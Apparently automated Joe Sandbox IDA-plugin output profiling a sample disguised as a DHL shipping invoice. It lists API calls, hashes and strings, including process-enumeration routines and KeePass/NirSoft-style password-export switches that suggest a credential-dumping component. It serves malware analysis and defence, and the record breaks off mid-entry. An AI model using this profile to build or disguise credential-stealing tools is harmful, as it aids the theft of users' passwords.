                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1010922700-0
                                                                                                                                                                                                                                      • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418716
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418749
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                                      • API String ID: 3356672799-1717621600
                                                                                                                                                                                                                                      • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                                      • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                                      • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                                                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                      • API String ID: 2012295524-70141382
                                                                                                                                                                                                                                      • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 667068680-3953557276
                                                                                                                                                                                                                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1700100422-0
                                                                                                                                                                                                                                      • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 552707033-0
                                                                                                                                                                                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                                      • String ID: 4$h
                                                                                                                                                                                                                                      • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                                      • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                                      • String ID: %%0.%df
                                                                                                                                                                                                                                      • API String ID: 3473751417-763548558
                                                                                                                                                                                                                                      • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                                      • String ID: A
                                                                                                                                                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                                      • String ID: caption
                                                                                                                                                                                                                                      • API String ID: 973020956-4135340389
                                                                                                                                                                                                                                      • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                                      • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
